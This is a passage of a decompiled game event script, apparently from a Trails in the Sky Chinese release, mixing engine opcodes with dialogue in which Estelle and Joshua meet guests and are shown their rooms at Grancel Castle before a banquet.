Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_218")
OP_A3(0x3FA)
Event(0, 9)
label("loc_218")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 3)), scpexpr(EXPR_END)), "loc_226")
OP_A3(0x3FB)
Event(0, 12)
label("loc_226")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 4)), scpexpr(EXPR_END)), "loc_234")
OP_A3(0x3FC)
Event(0, 14)
label("loc_234")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_298")
ClearChrFlags(0x8, 0x80)
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
ClearChrFlags(0xB, 0x80)
SetChrPos(0xA, -28870, 0, 53540, 270)
SetChrPos(0x9, -28040, 0, 54950, 211)
SetChrPos(0xB, -83970, 0, -52980, 270)
SetChrPos(0x8, -86020, 0, -52980, 90)
label("loc_298")
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x0), scpexpr(EXPR_END)),
(106, "loc_2A8"),
(101, "loc_2CA"),
(SWITCH_DEFAULT, "loc_2E0"),
)
label("loc_2A8")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_2C7")
OP_A2(0x63F)
Event(0, 11)
label("loc_2C7")
Jump("loc_2E0")
label("loc_2CA")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 7)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_2DD")
OP_A2(0x640)
Event(0, 13)
label("loc_2DD")
Jump("loc_2E0")
label("loc_2E0")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_30A")
SetChrChipByIndex(0x0, 7)
SetChrChipByIndex(0x1, 8)
SetChrChipByIndex(0x138, 9)
SetChrFlags(0x0, 0x1000)
SetChrFlags(0x1, 0x1000)
SetChrFlags(0x138, 0x1000)
label("loc_30A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 7)), scpexpr(EXPR_END)), "loc_319")
SetChrFlags(0xE, 0x80)
Jump("loc_357")
label("loc_319")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 3)), scpexpr(EXPR_END)), "loc_328")
ClearChrFlags(0xF, 0x80)
Jump("loc_357")
label("loc_328")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_END)), "loc_337")
SetChrFlags(0xE, 0x80)
Jump("loc_357")
label("loc_337")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_END)), "loc_346")
SetChrFlags(0xE, 0x80)
Jump("loc_357")
label("loc_346")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_END)), "loc_350")
Jump("loc_357")
label("loc_350")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_END)), "loc_357")
label("loc_357")
Return()
# Function_0_20A end
def Function_1_358(): pass
label("Function_1_358")
OP_4F(0x2B, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Return()
# Function_1_358 end
def Function_2_362(): pass
label("Function_2_362")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_377")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_362")
label("loc_377")
Return()
# Function_2_362 end
def Function_3_378(): pass
label("Function_3_378")
TalkBegin(0xFE)
ChrTalk(
0xFE,
"嗯,接下来是打扫客房。\x02",
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"因为今天有许多客人要在城里留宿,\x01",
"所以要做的准备不少啊~\x02",
)
)
CloseMessageWindow()
TalkEnd(0xFE)
Return()
# Function_3_378 end
def Function_4_3D9(): pass
label("Function_4_3D9")
TalkBegin(0xFE)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 7)), scpexpr(EXPR_END)), "loc_3E6")
Jump("loc_596")
label("loc_3E6")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 3)), scpexpr(EXPR_END)), "loc_495")
ChrTalk(
0xFE,
(
"《王城设计图》、《七至宝》、\x01",
"《百日战役全貌》……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"哎呀呀,\x01",
"被情报部拿走的这些书\x01",
"终于又回来了。\x02",
)
)
CloseMessageWindow()
Jump("loc_596")
label("loc_495")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_END)), "loc_49F")
Jump("loc_596")
label("loc_49F")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_END)), "loc_4A9")
Jump("loc_596")
label("loc_4A9")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_END)), "loc_510")
ChrTalk(
0xFE,
(
"完了,\x01",
"格兰赛尔城的设计图纸竟然也不见了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"情报部的家伙\x01",
"究竟打算拿去做什么啊。\x02",
)
)
CloseMessageWindow()
Jump("loc_596")
label("loc_510")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_END)), "loc_596")
ChrTalk(
0xFE,
(
"情报部的那群家伙,\x01",
"到底要做什么啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xFE,
(
"竟然把严禁外借的\x01",
"重要资料强行取走了……\x02",
)
)
CloseMessageWindow()
label("loc_596")
TalkEnd(0xFE)
Return()
# Function_4_3D9 end
def Function_5_59A(): pass
label("Function_5_59A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5A6")
Call(0, 6)
label("loc_5A6")
Return()
# Function_5_59A end
def Function_6_5A7(): pass
label("Function_6_5A7")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_EE2")
OP_A2(0x63B)
EventBegin(0x0)
Fade(1000)
SetChrPos(0x101, -85860, 0, -55170, 0)
SetChrPos(0x102, -84960, 0, -55250, 0)
OP_6D(-85030, 450, -53200, 1000)
ChrTalk(
0x8,
(
"#600F哦哦,来了吗。\x01",
"艾丝蒂尔、约修亚,\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
"#780F呵呵,好久不见了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哎……校长先生!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F难道校长先生您\x01",
"也被邀请参加晚宴吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F是啊,就是乘今天的定期船\x01",
"从卢安赶过来的呢。\x02\x03",
"我已经听说了,\x01",
"你们不是获得武术大会的冠军了吗?\x02\x03",
"学生们听到了肯定也会十分高兴的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嘿嘿……\x01",
"真的非常感谢您。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F不过,只凭我们自己的力量\x01",
"是不可能赢的。\x02\x03",
"说起来,我没有想到\x01",
"校长也会被邀请来呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F科林兹校长作为\x01",
"利贝尔首屈一指的贤者,\x01",
"每年都会出席王国会议呢。\x02\x03",
"被邀请出席晚宴\x01",
"也没有什么奇怪的啦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F哈哈,说我是贤者,\x01",
"真是太过誉了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯……王国会议是什么?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是为解决整个王国范围的问题,\x01",
"而召开的一年一度的例会。\x02\x03",
"女王陛下、各地区的市长,\x01",
"以及各界的代表人士齐聚一堂,\x01",
"讨论和协商各种各样的问题。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哎~是这样啊。\x02\x03",
"那么,今天的晚宴邀请的\x01",
"都是这些人啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F不……\x01",
"其实连一半都不到。\x02\x03",
"女王陛下身体欠佳,\x01",
"摩尔根将军忙于军务……\x02\x03",
"卢安的戴尔蒙市长\x01",
"也因为那个案件被逮捕了。\x02\x03",
"还有,拉赛尔博士也……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F和他相关的那个案件,\x01",
"现在还有很多地方没有弄清楚呢。\x02\x03",
"不仅牵扯到了亲卫队,\x01",
"还说是大规模的恐怖组织所为,\x01",
"到底有多少是真相啊……\x02\x03",
"真是的,在这种情况下,\x01",
"还有心思召开什么晚宴。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F………………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F………………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F不过,为了确认\x01",
"公爵阁下真正的心意,\x01",
"也有出席这次晚宴的必要。\x02\x03",
"而且,还要借此机会\x01",
"探望和问候女王陛下。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F嗯嗯。\x01",
"这个才是最重要的呢。\x02\x03",
"来到这格兰赛尔城,\x01",
"不能拜见陛下\x01",
"这不是扯的么。\x02\x03",
"而且,也很久没有见到\x01",
"科洛蒂娅公主了呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F科洛蒂娅公主……\x01",
"我记得是女王陛下的孙女吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F公主殿下\x01",
"也住在格兰赛尔城吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F不,平常是住在\x01",
"另外一个地方的。\x02\x03",
"不过,听说几天前\x01",
"回到王都来了呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哎~是这样啊……\x02\x03",
"嗯~如果有机会,\x01",
"一定要和她见上一面呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F呵呵,如果是你们,\x01",
"肯定能见到她的。\x02",
)
)
CloseMessageWindow()
EventEnd(0x0)
label("loc_EE2")
Return()
# Function_6_5A7 end
def Function_7_EE3(): pass
label("Function_7_EE3")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_EEF")
Call(0, 8)
label("loc_EEF")
Return()
# Function_7_EE3 end
def Function_8_EF0(): pass
label("Function_8_EF0")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_187D")
OP_A2(0x63A)
EventBegin(0x0)
EventBegin(0x0)
Fade(1000)
SetChrPos(0x101, -29280, 0, 55240, 135)
SetChrPos(0x102, -30310, 0, 54780, 135)
OP_6D(-28840, 0, 54560, 1000)
ChrTalk(
0x101,
"#000F啊……梅贝尔市长!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F莉拉小姐也来了啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"#620F艾丝蒂尔小姐,约修亚先生……\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F呵呵,我们又见面了呢。\x02\x03",
"我一直等着\x01",
"你们两个的到来呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F梅贝尔市长\x01",
"果然也被邀请参加晚宴呢。\x02\x03",
"哎,\x01",
"为什么会知道我们要来……?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F我是听克劳斯市长说的。\x02\x03",
"你们在武术大会中获得优胜,\x01",
"从而被邀请出席晚宴。\x02\x03",
"啊~如果早知道的话,\x01",
" \x01",
"来给你们加油了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"#620F小姐,话虽这么说……\x02\x03",
"如果这样,之后小姐自己\x01",
"不是要非常辛苦了?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
"#610F呜~我知道啦。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊哈哈……\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F真是的,女王陛下暂且不论,\x01",
"那个公爵举办的晚宴,\x01",
"本来就没有什么闲工夫来参加啊……\x02\x03",
"都是因为那个军队的女士官\x01",
"固执地催促让我出席,\x01",
"实在没办法才来王都的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F是情报部的凯诺娜上尉吧?\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F嗯,就是她。\x02\x03",
"虽然很有礼貌,其实不把人放在眼里,\x01",
"我真是不喜欢那个人呢。\x02\x03",
"最近,也没办法\x01",
"和摩尔根将军取得联系……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F那是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F和哈肯门那边\x01",
"联系不上吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F坚持说『将军不在』,\x01",
"让我吃了闭门羹。\x02\x03",
"好像是为了应对恐怖事件,\x01",
"工作相当地繁忙呢。\x02\x03",
"本来还想能不能\x01",
"在今天的晚宴上见面呢……\x02\x03",
"看起来好像也没有出席呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F是这样吗……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F市长对这件事是怎么想的?\x02\x03",
"在这个时候把市长们召集起来\x01",
"召开这样的晚宴……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F是呢……\x02\x03",
"如果是女王陛下举办的话,\x01",
"应该是要宣布重要的事情吧……\x02\x03",
"不过这次大概只是为了\x01",
"陪公爵阁下打发时间而已。\x02\x03",
"滥用陛下代理人的特权,\x01",
"让人认为他大权在握而已。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哇~真是精辟啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F不过,\x01",
"也有可能不只是为这样的理由。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F算了,听说这里的西餐\x01",
"是整个王国最棒的……\x02\x03",
"享用完美味的晚餐,\x01",
"探望一下女王陛下,\x01",
"然后就赶快回柏斯吧。\x02",
)
)
CloseMessageWindow()
EventEnd(0x0)
label("loc_187D")
Return()
# Function_8_EF0 end
def Function_9_187E(): pass
label("Function_9_187E")
EventBegin(0x0)
SetChrPos(0x101, -52050, 0, 2040, 0)
SetChrPos(0x102, -52050, 0, 2040, 0)
SetChrPos(0x108, -52050, 0, 2040, 0)
SetChrPos(0xC, -52050, 0, 2040, 0)
ClearChrFlags(0xC, 0x80)
SetChrFlags(0xC, 0x40)
OP_69(0x102, 0x0)
OP_6A(0x102)
def lambda_18DE():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xC, 1, lambda_18DE)
Sleep(500)
def lambda_18FE():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_18FE)
Sleep(500)
def lambda_191E():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_191E)
Sleep(500)
def lambda_193E():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_193E)
WaitChrThread(0xC, 0x1)
def lambda_195E():
OP_8E(0xFE, 0xFFFECB86, 0x0, 0x1CDE, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xC, 1, lambda_195E)
WaitChrThread(0x102, 0x1)
def lambda_197E():
OP_8E(0xFE, 0xFFFEC7F8, 0x0, 0x159A, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_197E)
WaitChrThread(0x101, 0x1)
def lambda_199E():
OP_8E(0xFE, 0xFFFECD2A, 0x0, 0x1554, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_199E)
WaitChrThread(0x108, 0x1)
def lambda_19BE():
OP_8E(0xFE, 0xFFFECA50, 0x0, 0x1162, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_19BE)
WaitChrThread(0xC, 0x1)
Sleep(200)
OP_8E(0xC, 0xFFFEC668, 0x0, 0x1C52, 0x7D0, 0x0)
TurnDirection(0xC, 0x102, 0)
ChrTalk(
0xC,
(
"这个就是各位\x01",
"晚上可以使用的房间。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"请进吧。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯、嗯……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F那么我们就告辞了。\x02",
)
CloseMessageWindow()
OP_43(0x101, 0x1, 0x0, 0xA)
Sleep(500)
OP_43(0x102, 0x1, 0x0, 0xA)
Sleep(500)
OP_43(0x108, 0x1, 0x0, 0xA)
Sleep(1000)
OP_44(0x101, 0xFF)
OP_44(0x102, 0xFF)
OP_44(0x108, 0xFF)
ClearMapFlags(0x1)
Fade(1000)
OP_6D(-79120, 0, 55910, 0)
OP_67(0, 8000, -10000, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
OP_9F(0x101, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
OP_9F(0x102, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
SetChrPos(0xC, -80040, 0, 50510, 0)
SetChrPos(0x101, -80880, 0, 53000, 315)
SetChrPos(0x102, -79650, 0, 53710, 270)
SetChrPos(0x108, -78830, 0, 52390, 0)
Sleep(1000)
ChrTalk(
0x101,
"#000F哇……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F能在这种地方过夜,\x01",
"真是无法想象呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哎呀~真是不错啊,\x01",
"可以当成炫耀的资本了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"在晚宴开始之前,\x01",
"请在此等候。\x02",
)
)
CloseMessageWindow()
def lambda_1C1C():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_1C1C)
def lambda_1C2A():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_1C2A)
def lambda_1C38():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_1C38)
OP_6D(-79790, 0, 52600, 1000)
ChrTalk(
0xC,
(
"虽然城内允许自由参观,\x01",
"不过因为警卫上的理由,\x01",
"有一些禁止进入的区域。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"请不要到那些地方去。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嗯,具体来说\x01",
"哪些地方不能去呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"首先是,\x01",
"女王陛下居住的女王宫。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"就是在屋顶空中庭园的一角\x01",
"建造的小型宫殿。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F空中庭园……\x01",
"听起来感觉十分地美丽呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"嘻嘻……生日庆典的时候,\x01",
"陛下会在那里的阳台上\x01",
"向王都的市民致意。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"如果只是到空中庭园去的话,\x01",
"也应该足够了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"还有,其他禁止进入的场所……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"在1楼的亲卫队办公室\x01",
"以及地下的宝物库。\x02",
)
)
CloseMessageWindow()
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
ChrTalk(
0x102,
"#010F亲卫队办公室……\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F是不是作为恐怖分子\x01",
"受到通缉的那些人呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"是、是的……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"现在,那个办公室\x01",
"正由情报部的人使用。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"所以不允许进入,\x01",
"请你们理解。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F差不多明白了。\x02\x03",
"对了,晚宴邀请的其他客人\x01",
"现在在哪里呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"过一会儿,\x01",
"你们就能见到了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"大概他们现在\x01",
"正在各自的房间里休息吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F是吗……\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F那么,\x01",
"克劳斯市长已经来了吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"是的,\x01",
"刚刚才招待过他。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"那么,我先告退了……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"如果有什么事情的话,\x01",
"请到1楼的休息室来找我。\x02",
)
)
CloseMessageWindow()
OP_8C(0xC, 180, 400)
def lambda_21AF():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0x0, 0x3E8)
ExitThread()
QueueWorkItem(0xC, 1, lambda_21AF)
OP_8E(0xC, 0xFFFEC6F4, 0x0, 0xBC3E, 0x3E8, 0x0)
SetChrFlags(0xC, 0x4)
ChrTalk(
0x101,
"#000F嗯……\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
TurnDirection(0x102, 0x101, 400)
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔和约修亚\x01",
"趁金没有注意交换了眼色。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
def lambda_225A():
TurnDirection(0xFE, 0x108, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_225A)
TurnDirection(0x101, 0x108, 400)
ChrTalk(
0x101,
(
"#000F……我说,金先生。\x02\x03",
"我们想借此机会\x01",
"在城里参观一下……\x02",
)
)
CloseMessageWindow()
def lambda_22C5():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_22C5)
ChrTalk(
0x102,
"#010F晚宴开始之前就会回来。\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哎呀哎呀,刚刚比赛完,\x01",
"年轻人真是精力旺盛啊。\x02\x03",
"好,你们去吧。\x02\x03",
"吃饭之前\x01",
"我就在这豪华的房间里休息一下吧。\x02",
)
)
CloseMessageWindow()
Fade(1000)
OP_6D(-79060, 0, 5580, 0)
RemoveParty(0x7, 0xFF)
SetChrPos(0x101, -79060, 0, 9840, 0)
SetChrPos(0x102, -79060, 0, 9840, 0)
def lambda_23EC():
OP_8E(0xFE, 0xFFFECE2E, 0x0, 0x15B8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_23EC)
Sleep(600)
def lambda_240C():
OP_8E(0xFE, 0xFFFECA5A, 0x0, 0x190A, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_240C)
WaitChrThread(0x101, 0x1)
def lambda_242C():
TurnDirection(0xFE, 0x102, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_242C)
WaitChrThread(0x102, 0x1)
def lambda_243F():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_243F)
ChrTalk(
0x101,
(
"#000F在晚宴开始之前,\x01",
"一定要尽可能多做一些事情。\x02\x03",
"首先要去找\x01",
"尤莉亚小姐所说的希尔丹夫人。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F还有,我们最好\x01",
"去和其他的客人打个招呼。\x02\x03",
"大概,认识的人会很多吧。\x02",
)
)
CloseMessageWindow()
OP_6A(0x0)
ClearMapFlags(0x1)
EventEnd(0x0)
Return()
# Function_9_187E end
def Function_10_2539(): pass
label("Function_10_2539")
OP_8E(0xFE, 0xFFFECB5E, 0x0, 0x1CA2, 0xBB8, 0x0)
def lambda_2553():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0x0, 0x3E8)
ExitThread()
QueueWorkItem(0xFE, 3, lambda_2553)
OP_8E(0xFE, 0xFFFECB68, 0x0, 0x2602, 0xBB8, 0x0)
Return()
# Function_10_2539 end
def Function_11_2574(): pass
label("Function_11_2574")
EventBegin(0x0)
OP_6D(-80130, 0, 51090, 0)
OP_67(0, 8000, -10000, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
AddParty(0x7, 0xFF)
SetChrPos(0x101, -80670, 0, 51310, 270)
SetChrPos(0x102, -79770, 0, 50560, 270)
SetChrPos(0x108, -87580, 0, 52200, 90)
OP_6D(-83020, 0, 52310, 2000)
ChrTalk(
0x108,
(
"#070F哟,艾丝蒂尔、约修亚。\x01",
"回来的是不是有些晚呢。\x02\x03",
"就要到晚宴开始的时候了吧?\x02",
)
)
CloseMessageWindow()
def lambda_2653():
OP_8E(0xFE, 0xFFFEBD4E, 0x0, 0xCDA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2653)
Sleep(300)
def lambda_2673():
OP_6D(-86640, 0, 52720, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_2673)
def lambda_268B():
OP_8E(0xFE, 0xFFFEBD4E, 0x0, 0xCDA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_268B)
WaitChrThread(0x101, 0x1)
def lambda_26AB():
OP_8E(0xFE, 0xFFFEB042, 0x0, 0xD0D4, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_26AB)
WaitChrThread(0x102, 0x1)
def lambda_26CB():
OP_8E(0xFE, 0xFFFEAFF2, 0x0, 0xCB48, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_26CB)
WaitChrThread(0x101, 0x1)
TurnDirection(0x101, 0x108, 400)
WaitChrThread(0x101, 0x3)
ChrTalk(
0x101,
(
"#000F抱歉啊,金大哥。\x02\x03",
"东看看西逛逛的\x01",
"就把时间给忘了~\x02\x03",
"而且还和各地的市长们\x01",
"谈了许多哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F咦,你们俩之前就\x01",
"认识那些有身份的人物吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F洛连特的市长\x01",
"平日里就对我们很亲切。\x02\x03",
"其他的几位是我们在旅行\x01",
"途中经过各个城市时认识的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F原来如此啊。\x02\x03",
"游击士在完成任务的时候,\x01",
"的确有许多结识有身份人物的机会呢。\x02\x03",
"可是这样看来,\x01",
"你们好像极为活跃对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哈哈哈……还没有到那种程度啦。\x02\x03",
"金大哥到王都来是因为\x01",
"有什么任务要完成吗?\x02\x03",
"我想,虽说是在别国,\x01",
